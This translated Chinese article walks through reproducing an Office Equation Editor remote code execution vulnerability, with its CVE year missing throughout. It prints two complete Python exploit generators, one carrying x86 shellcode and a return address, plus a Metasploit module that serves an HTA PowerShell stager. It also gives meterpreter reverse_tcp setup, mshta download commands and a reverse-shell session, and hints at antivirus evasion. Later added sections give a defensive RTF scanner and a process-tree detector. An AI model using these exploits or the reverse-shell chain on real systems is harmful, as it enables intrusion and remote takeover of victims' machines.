This article is from Xiao Zhihua's GitChat talk "Reproducing the Office remote code execution vulnerability"; click "Read the original" to see the discussion transcript.
Editor | 天津饭
What follows is the local reproduction process, pasted directly; how to weaponise it is left for you to work out.
On 14 November, Microsoft released its November security update. The most notable item was the quiet fix for a long-dormant Office remote code execution vulnerability (CVE--11882).
It is a memory corruption bug in Office and affects every Office version in common use. An attacker who exploits it can run arbitrary commands as the currently logged-in user.
Because of the broad impact, the Jinjing security research team kept monitoring attacks related to the vulnerability after its disclosure.
On 19 November, a PoC was seen circulating online and the related samples were analysed right away. At that time only Microsoft's own antivirus detected the sample.
Affected versions:
Office 365
Microsoft Office 2000
Microsoft Office
Microsoft Office Service Pack 3
Microsoft Office Service Pack 2
Microsoft Office Service Pack 1
Microsoft Office
In other words, it affects every mainstream Office version in use today; it is essentially a universal hit.
Two PoCs are given here:
/embedi/CVE--11882, written by a foreign hacker
/Ridter/CVE--11882, written by a Chinese hacker
The code of both PoCs is also pasted below.
The code of Command43b_CVE--11882.py is as follows:
# Python 2 script (print statement, str.encode("hex"), str.translate(None, ...))
import argparse
import sys

RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}{\*\generator Riched20 6.3.9600}\viewkind4\uc1\pard\sa200\sl276\slmult1\f0\fs22\lang9"""

RTF_TRAILER = R"""\par}"""

OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """

OBJECT_TRAILER = R"""}{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}{\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}{\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}{\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0\picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}010009000003510000000000120000000000050000000902000000000500000001000000050000000102ffffff00050000002e0118000000050000000b0200000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}"""

# Hex dump of the embedded Equation.3 OLE object; the blob is elided in this article's listing
OBJDATA_TEMPLATE = R"""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"""

# Byte offset of the command (the font name of the Equation Native stream) inside the
# template, doubled because the template is hex text
COMMAND_OFFSET = 0x949*2

def create_ole_exec_primitive(command):
    if len(command) > 43:
        print "[!] Primitive command must be shorter than 43 bytes"
        sys.exit(0)
    hex_command = command.encode("hex")
    # strip line breaks so COMMAND_OFFSET indexes into pure hex
    objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n")
    # overwrite the font-name region with the command, keep everything else
    ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]
    return OBJECT_HEADER + ole_data + OBJECT_TRAILER

def create_rtf(header,command,trailer):
    ole1 = create_ole_exec_primitive(command + " &")
    # We need 2 or more commands for executing remote file from WebDAV
    # because WebClient service start may take some time
    return header + ole1 + trailer

def getrheader(file):
    input_file = open(file,"r").read()
    r_header = input_file.split("{\*\datastore")[0]
    return r_header

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="PoC for CVE--11882")
    parser.add_argument("-c", "--command", help="Command to execute.", required=True)
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
    parser.add_argument("-i", "--input", help="Input normal rtf.", required=False)
    args = parser.parse_args()
    if args.input != None:
        r_header = getrheader(args.input)
    else:
        r_header = RTF_HEADER
    rtf_content = create_rtf(r_header, args.command, RTF_TRAILER)
    output_file = open(args.output, "w")
    output_file.write(rtf_content)
    print "[*] Done ! output file --> " + args.output
The code of Command109b_CVE--11882.py is as follows:
# Original poc :/embedi/CVE--11882# This version accepts a command with 109 bytes long in maximum.# Sorry I don't know how to read the struct in objdata, hence I cannot modify the length parameter to aquire a arbitrary length code execution.# But that's enough in exploitation. We can use regsvr32 to load sct file remotely.:)import argparseimport sysfrom struct import packhead=r'''{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}{\*\generator Riched20 6.3.9600}\viewkind4\uc1 \pard\sa200\sl276\slmult1\f0\fs22\lang9'''objclass=r'''{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffefffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff5f006f007400200045006e0074007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020cea5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006f006d0070004f006a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000100000003000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004f006a0049006e0066006f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fefffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'''tail=r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}{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}{\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}{\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}{\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn 
fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0\picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}010009000003510000000000120000000000050000000902000000000500000001000000050000000102ffffff00050000002e0118000000050000000b0200000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}\par}'''

# stage1: x86 shellcode that resolves WinExec through the EQNEDT32 import table and runs the command
# 0:  b8 44 eb 71 12    mov eax,0x1271eb44
# 5:  ba 78 56 34 12    mov edx,0x12345678
# a:  31 d0             xor eax,edx
# c:  8b 08             mov ecx,DWORD PTR [eax]
# e:  8b 09             mov ecx,DWORD PTR [ecx]
# 10: 8b 09             mov ecx,DWORD PTR [ecx]
# 12: 66 83 c1 3c       add cx,0x3c
# 16: 31 db             xor ebx,ebx
# 18: 53                push ebx
# 19: 51                push ecx
# 1a: be 64 3e 72 12    mov esi,0x12723e64
# 1f: 31 d6             xor esi,edx
# 21: ff 16             call DWORD PTR [esi] // call WinExec
# 23: 53                push ebx
# 24: 66 83 ee 4c       sub si,0x4c
# 28: ff 10             call DWORD PTR [eax] // call ExitProcess
stage1="\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10"
# pads with nop
stage1=stage1.ljust(44,'\x90')

def genrtf(cmd,r_head):
    if len(cmd) > 109:
        print "[!] Primitive command must be shorter than 109 bytes"
        sys.exit(0)
    # 28-byte EQNOLEFILEHDR, 5-byte MTEF header, size/line records, then a FONT record (tag 0x08, tface 'Z', style 'Z')
    payload='\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ'
    payload+=stage1                      # 44 bytes of "font name": the shellcode
    payload+=pack('<I',0x00402114) # ret
    payload+='\x00'*2
    payload+=cmd                         # command string located by stage1
    payload=payload.ljust(197,'\x00')
    return r_head+objclass+payload.encode('hex')+tail

def getrheader(file):
    input_file = open(file,"r").read()
    r_header = input_file.split("{\*\datastore")[0]
    return r_header

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="PoC for CVE--11882")
    parser.add_argument("-c", "--cmd", help="Command run in target system", required=True)
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
    parser.add_argument("-i", "--input", help="Input normal rtf.", required=False)
    args = parser.parse_args()
    if args.input != None:
        r_header = getrheader(args.input)
    else:
        r_header = head
    with open(args.output,'wb') as f:
        f.write(genrtf(args.cmd,r_header))
    print "[*] Done ! output file --> " + args.output
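To see concretely what the two scripts above write into the document, and to have an offline way of triaging a suspicious RTF, here is an added example written for this edit; it is not part of the article or of either PoC repository, and it is Python 3 (the PoCs are Python 2). It pulls every \objdata block out of an RTF, locates the Equation Native stream by its 28-byte header, reads the MTEF FONT record and measures the font name: both PoCs put the return address 44 bytes after the start of that name (43-byte command plus NUL in the embedi script, 44 bytes of stage1 in the Ridter script), so any name that long has already overrun the stack buffer. Assumptions are marked in the comments: the sample documents come from build_sample, which embeds a bare stream instead of the OLE compound file a real document carries, and the record walk is a heuristic that treats every byte with low nibble 8 as a FONT tag rather than a full MTEF parser.

```python
import re
import struct

# Layout facts taken from the PoCs above: the Equation Native stream starts with a
# 28-byte EQNOLEFILEHDR (cbHdr = 0x1c, version = 2), then a 5-byte MTEF header and
# MTEF records. A FONT record is tag (low nibble 8), tface, style, NUL-terminated
# name; both scripts place the return address 44 bytes into that name.
EQN_HDR_SIG = b"\x1c\x00\x00\x00\x02\x00"
EQN_HDR_LEN = 0x1C
MTEF_HDR_LEN = 5
MTEF_FONT = 0x08
RET_OFFSET = 44
# CLSID {0002CE02-0000-0000-C000-000000000046} (Equation.3) in the byte order it
# has inside the PoCs' objdata; catches samples that omit the \objclass keyword.
EQUATION3_CLSID = bytes.fromhex("02ce020000000000c000000000000046")

OBJDATA_RE = re.compile(r"\{\\\*\\objdata\s*([0-9a-fA-F\s]*)\}")
OBJCLASS_RE = re.compile(r"\\objclass\s+([^\\{}\s]+)")


def font_records(blob):
    """Yield (font_name, dword_at_return_slot) for every FONT-looking record in
    each Equation Native stream inside blob. Heuristic: the stream is found by
    its header signature, and any record byte with low nibble 8 is read as FONT."""
    pos = blob.find(EQN_HDR_SIG)
    while pos != -1:
        mtef = blob[pos + EQN_HDR_LEN:]
        for i in range(MTEF_HDR_LEN, len(mtef)):
            if (mtef[i] & 0x0F) != MTEF_FONT:
                continue
            name_start = i + 3                      # skip tag, tface, style
            end = mtef.find(b"\x00", name_start)
            name = mtef[name_start:end if end != -1 else len(mtef)]
            ret = None
            if len(mtef) >= name_start + RET_OFFSET + 4:
                ret = struct.unpack_from("<I", mtef, name_start + RET_OFFSET)[0]
            yield name, ret
        pos = blob.find(EQN_HDR_SIG, pos + 1)


def scan_rtf(rtf_text):
    """One finding per embedded object: declared class, Equation.3 CLSID present,
    longest FONT name, the dword at the return-address slot, overflow verdict."""
    findings = []
    for m in OBJDATA_RE.finditer(rtf_text):
        blob = bytes.fromhex(re.sub(r"\s", "", m.group(1)))
        obj_start = rtf_text.rfind("{\\object", 0, m.start())
        classes = OBJCLASS_RE.findall(rtf_text[max(obj_start, 0):m.start()])
        longest, ret_dword = b"", None
        for name, ret in font_records(blob):
            if len(name) > len(longest):
                longest, ret_dword = name, ret
        findings.append({
            "objclass": classes[-1] if classes else None,
            "equation_clsid": EQUATION3_CLSID in blob,
            "font_name_len": len(longest),
            "ret_dword": ret_dword,
            "overflow": len(longest) >= RET_OFFSET,
        })
    return findings


def build_sample(font_name):
    """Constructed test input, not a real sample: an RTF whose Equation.3 object
    carries a bare Equation Native stream with one FONT record. Real documents
    wrap the stream in an OLE compound file; the scanner keys on the stream
    header only, so it finds it there too unless the stream is split across sectors."""
    ole1 = (bytes.fromhex("01050000020000000b000000") + b"Equation.3\x00"
            + b"\x00" * 12 + EQUATION3_CLSID)      # CLSID stands in for CompObj
    eqn_hdr = bytes.fromhex("1c000000 0200 9ec4 a9000000 00000000 c8a75c00 c4ee5b00 00000000")
    mtef = (bytes.fromhex("030101030a")            # MTEF v3 header
            + bytes([0x0A, 0x01])                  # FULL size record, LINE record
            + bytes([MTEF_FONT, 0x5A, 0x5A])       # FONT: tag, tface, style
            + font_name + b"\x00"                  # NUL-terminated font name
            + b"\x00")                             # END record
    objdata = (ole1 + eqn_hdr + mtef).hex()
    return (r"{\rtf1\ansi{\object\objemb\objupdate{\*\objclass Equation.3}"
            r"\objw380\objh260{\*\objdata " + objdata + r"}{\result }}\par}")


if __name__ == "__main__":
    benign = build_sample(b"Times New Roman")
    # 44 bytes of filler, then the three low bytes of 0x00402114 (the ret value the
    # Ridter PoC packs); the NUL that terminates the name supplies the fourth byte.
    evil = build_sample(b"A" * 44 + b"\x14\x21\x40")
    for label, doc in (("benign", benign), ("overflow", evil)):
        print(label, scan_rtf(doc))
```

Run as a script it prints one finding per sample: the benign one has a 15-byte font name and no return-address slot, the constructed overflow one reports font_name_len 47 and ret_dword 0x402114. On a real file feed the RTF text to scan_rtf; an Equation.3 object whose longest font name reaches 44 bytes is the condition both PoCs depend on, and the CLSID check still fires when the \objclass keyword has been stripped.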
Tools used:
Windows7
Office
Metasploit
Exploitation steps:
Open the Command43b_CVE--11882.py script above and test generating a DOC file.
The command is:
python Command43b_CVE--11882.py -c "cmd.exe /c calc.exe" -o cve.doc
This command generates a file named cve.doc in the current directory (the content is RTF; Word opens it by sniffing the content, not by the extension). Take it to the Windows 7 target and open it to see the effect, as shown in the figure below.
After Windows 7 opens the malicious doc, the calculator spawned by the system pops up, proving the PoC works (why pop calc... that joke has been done to death by hackers).
Exploitation with MSF
Now we need an rb script to interact with MSF; the steps are as follows.
First add the script to MSF. If MSF has not been modified, the path should be /usr/share/metasploit-framework/modules/exploits/windows; create a new folder under that directory.
Write the following script into PS_shell.rb.
##
# This module requires Metasploit: /download
# Current source: /rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Office Payload Delivery',
      'Description'    => %q{
        This module generates an command to place within
        a word document, that when executed, will retrieve a HTA payload
        via HTTP from an web server. Currently have not figured out how
        to generate a doc.
      },
      'License'        => MSF_LICENSE,
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Automatic', {} ],
        ],
      'DefaultTarget'  => 0,
    ))
  end

  # Serve the HTA (which carries a PowerShell stager) to whoever requests the URI
  def on_request_uri(cli, _request)
    print_status("Delivering payload")
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework,
      ARCH_X86,
      'win',
      p.encoded,
      'hta-psh',
      { :arch => ARCH_X86, :platform => 'win '}
    )
    send_response(cli, data, 'Content-Type' => 'application/hta')
  end

  # Print the one-liner to embed in the document
  def primer
    url = get_uri
    print_status("Place the following DDE in an MS document:")
    print_line("mshta.exe \"#{url}\"")
  end
end
After starting MSF, search for the exploit module.
msf > search PS_shell
As shown in the figure below.
Use the module:
msf > use exploit/windows/CVE--11882/PS_shell
As shown in the figure below.
The steps in the figure above are as follows:
msf exploit(PS_shell) > set payload windows/meterpreter/reverse_tcp    // use a reverse TCP payload
payload => windows/meterpreter/reverse_tcp
msf exploit(PS_shell) > set lhost 192.168.30.128    // local IP
lhost => 192.168.30.128
msf exploit(PS_shell) > set URIPATH test    // URI path
URIPATH => test
msf exploit(PS_shell) > show options    // check the configuration

Module options (exploit/windows/CVE--11882/PS_shell):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   SRVHOST   0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH   test             no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.30.128   yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
Once the configuration is correct, run it. MSF serves the HTA on local port 8080 and the handler listens on 4444; when the target opens the doc the exploit fires and the reverse shell opens a session.
msf exploit(PS_shell) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.30.128:4444 
msf exploit(PS_shell) > [*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.30.128:8080/test
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.30.128:8080/test"
This test URL is obviously not a doc file by itself; we use the Python script from earlier to generate a malicious doc that carries the mshta.exe command.
Generating the malicious doc file
As shown in the figure below.
Now take test1.doc to Windows 7 and open it, as shown below.
Result on Windows 7
As shown in the figure below.
MSF listener
As shown in the figure below.
MSF has established a connection with Windows 7. This attack works through a PowerShell reverse shell: when the malicious doc is opened, a PowerShell window flashes briefly.
net user
As shown in the figure below.
This completes the reproduction. One more thing: attacks today are no longer limited to EXE files.
360 scans, identifies and blocks the sample: because it invokes powershell, which looks like malicious behaviour, 360 raises an alert.
It can be evaded with AV bypass techniques; how to do that is a matter of your own skill.
Most people do not expect an attack through a malicious doc. Be careful with anything strangers send you: not only EXE files, a doc can be full of malice too.
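The chain in the screenshots (the doc launches mshta.exe, which fetches the HTA and starts PowerShell) leaves a process tree that is easy to spot, which is also why 360 alerts on the PowerShell launch. As an added example, not from the article, here is a small Python 3 detector run over constructed process-creation events; the Sysmon-style field names (Image, ParentImage, CommandLine, ProcessId) and the sample log are assumptions of the example. One fact it relies on beyond the page: the Equation.3 object is hosted by EQNEDT32.EXE, which Windows starts through DCOM, so its parent is svchost.exe rather than WINWORD.EXE. A rule that only watches Word spawning children misses this chain, while Equation Editor itself spawning any child is never legitimate.

```python
import json
import ntpath
import re

# Living-off-the-land binaries that a document-borne stager typically launches
# (cmd, mshta and powershell appear in the article; regsvr32 is the alternative
# the Ridter script mentions in its header comment).
LOLBINS = {"cmd.exe", "mshta.exe", "powershell.exe", "regsvr32.exe",
           "wscript.exe", "cscript.exe", "rundll32.exe", "certutil.exe"}


def basename(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return the rule names a process-creation event trips (empty if none)."""
    child = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmdline = event.get("CommandLine", "")
    hits = []
    # Equation Editor never legitimately starts other programs.
    if parent == "eqnedt32.exe":
        hits.append("eqnedt32_spawned_child")
    # mshta pulling its HTA from a web server, as the MSF module's primer tells you to do
    if child == "mshta.exe" and re.search(r"https?://", cmdline, re.I):
        hits.append("mshta_remote_hta")
    # the hta-psh payload: mshta hands off to PowerShell (or another LOLBin)
    if child in LOLBINS and parent == "mshta.exe":
        hits.append("mshta_spawned_lolbin")
    return hits


def scan_events(lines):
    """Parse JSON-lines events and return (pid, image, rules) for each hit."""
    out = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        hits = classify(ev)
        if hits:
            out.append((ev["ProcessId"], basename(ev["Image"]), hits))
    return out


# Constructed sample log (assumption of this example), mirroring the article's chain:
# Word opens the doc, DCOM starts EQNEDT32.EXE, the overflow runs mshta, the HTA runs PowerShell.
SAMPLE_LOG = r"""
{"ProcessId": 3120, "Image": "C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"WINWORD.EXE\" test1.doc"}
{"ProcessId": 4380, "Image": "C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "\"EQNEDT32.EXE\" -Embedding"}
{"ProcessId": 4416, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", "CommandLine": "mshta.exe \"http://192.168.30.128:8080/test\""}
{"ProcessId": 4520, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "powershell.exe -nop -w hidden -e ..."}
{"ProcessId": 4608, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", "CommandLine": "cmd.exe /c calc.exe"}
{"ProcessId": 4700, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd.exe"}
"""

if __name__ == "__main__":
    for pid, image, rules in scan_events(SAMPLE_LOG.splitlines()):
        print(pid, image, ", ".join(rules))
```

On the sample log the detector reports the mshta launch (two rules), the PowerShell child of mshta, and the calc.exe test from earlier in the article; the Word process and the interactive cmd.exe started from Explorer stay quiet. The EQNEDT32.EXE event itself is not flagged, since Equation Editor starting is normal whenever a document contains an equation; what is abnormal is what it starts next.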